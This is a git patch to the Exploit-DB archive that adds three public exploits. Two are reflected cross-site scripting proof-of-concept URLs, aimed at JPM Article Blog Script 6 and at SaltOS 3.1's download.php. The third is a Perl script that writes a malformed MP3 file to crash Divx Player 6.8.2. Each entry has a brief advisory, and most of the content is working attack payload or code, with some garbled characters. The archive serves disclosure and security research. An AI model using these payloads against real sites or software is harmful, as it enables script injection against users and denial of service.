From 47c7b2c11056c06e809d3d921b70e68e984eea56 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Mon, 20 Jul 2015 05:02:04 +0000
Subject: [PATCH] DB: 2015-07-20

3 new exploits
---
 files.csv                       |  3 +++
 platforms/php/webapps/37641.txt |  7 +++++++
 platforms/php/webapps/37642.txt |  9 +++++++++
 platforms/windows/dos/37640.pl  | 19 +++++++++++++++++++
 4 files changed, 38 insertions(+)
 create mode 100755 platforms/php/webapps/37641.txt
 create mode 100755 platforms/php/webapps/37642.txt
 create mode 100755 platforms/windows/dos/37640.pl

diff --git a/files.csv b/files.csv
index bc34a320b..000363a36 100755
--- a/files.csv
+++ b/files.csv
@@ -33973,3 +33973,6 @@ id,file,description,date,author,platform,type,port
 37637,platforms/php/webapps/37637.pl,"Elastix 'graph.php' Local File Include Vulnerability",2012-08-17,cheki,php,webapps,0
 37638,platforms/cgi/webapps/37638.txt,"LISTSERV 16 'SHOWTPL' Parameter Cross Site Scripting Vulnerability",2012-08-17,"Jose Carlos de Arriba",cgi,webapps,0
 37639,platforms/multiple/dos/37639.html,"Mozilla Firefox Remote Denial of Service Vulnerability",2012-08-17,"Jean Pascal Pereira",multiple,dos,0
+37640,platforms/windows/dos/37640.pl,"Divx Player Denial of Service Vulnerability",2012-08-20,Dark-Puzzle,windows,dos,0
+37641,platforms/php/webapps/37641.txt,"JPM Article Blog Script 6 'tid' Parameter Cross Site Scripting Vulnerability",2012-08-21,Mr.0c3aN,php,webapps,0
+37642,platforms/php/webapps/37642.txt,"SaltOS 'download.php' Cross Site Scripting Vulnerability",2012-08-18,"Stefan Schurtz",php,webapps,0
diff --git a/platforms/php/webapps/37641.txt b/platforms/php/webapps/37641.txt
new file mode 100755
index 000000000..969122994
--- /dev/null
+++ b/platforms/php/webapps/37641.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/55112/info
+
+JPM Article Blog Script 6 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/forum/index.php?tid=4â??></title><script>alert(Mr.0c3aN)</script>><marquee><h1>ocean</h1></marquee> 
\ No newline at end of file
diff --git a/platforms/php/webapps/37642.txt b/platforms/php/webapps/37642.txt
new file mode 100755
index 000000000..b4e0e0d95
--- /dev/null
+++ b/platforms/php/webapps/37642.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/55117/info
+
+SaltOS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+SaltOS 3.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/SaltOS-3.1/user/lib/phpexcel/PHPExcel/Shared/JAMA/docs/download.php/ â??><script>alert(â??xssâ??)</script> 
\ No newline at end of file
diff --git a/platforms/windows/dos/37640.pl b/platforms/windows/dos/37640.pl
new file mode 100755
index 000000000..b8dae6a5a
--- /dev/null
+++ b/platforms/windows/dos/37640.pl
@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/55105/info
+
+Divx Player is prone to a denial-of-service vulnerability.
+
+An attacker can exploit this issue to cause the application to crash, denying service to legitimate users.
+
+Divx 6.8.2 is vulnerable; other versions may also be affected. 
+
+# usage : perl divxdOs.pl 
+my $id="\x55\x46\x49\x44\x20\x55\x6e\x69\x71\x75\x65\x20\x66\x69\x6c\x65\x20\x69\x64\x65\x6e\x74\x69\x66\x69\x65\x72\x0d\x0a\x55\x53\x45\x52\x20\x54\x65\x72\x6d\x73\x20\x6f\x66\x20\x75\x73\x65\x0d\x0a\x55\x53\x4c\x54\x20\x55\x6e\x73\x79\x6e\x63\x68\x72\x6f\x6e\x69\x7a\x65\x64\x20\x6c\x79\x72\x69\x63\x2f\x74\x65\x78\x74\x20\x74\x72\x61\x6e\x73\x63\x72\x69\x70\x74\x69\x6f\x6e";
+my $cdat= "\x0c\x0b\x0b\x0c\x19\x12\x13\x0f\x14\x1d\x1a\x1f\x1e\x1d\x1a\x1c\x1c\x20\x24\x2e\x27\x20\x22\x2c\x23\x1c\x1c\x28\x2b\x78\x29\x2c\x30\x27\x39\x3d\x30\x3c\x2e\x61\x78\x32\xc3\x83\xc2\xbf\xc3\x83\xef\xbf\xbd";
+
+ 
+my $file= "dark-puzzle.mp3";
+open($FILE,">$file");
+print $FILE $id.$cdat;
+close($FILE);
+print "MP3 File Created , Enjoy !!\n";
+